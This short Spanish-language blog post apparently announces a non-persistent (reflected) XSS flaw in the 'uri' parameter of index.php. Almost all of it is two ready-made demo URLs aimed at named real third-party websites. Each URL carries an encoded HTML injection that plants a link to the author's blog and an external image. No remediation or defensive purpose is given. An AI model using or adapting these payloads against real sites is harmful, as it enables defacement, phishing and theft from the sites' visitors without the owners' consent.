Xss no persistente
el parametro "uri" es vulnarable a xss en el archivo index.php
+[DEMO] http://www.mht.ch/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E
http://otn.ca/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E
No hay comentarios:
Publicar un comentario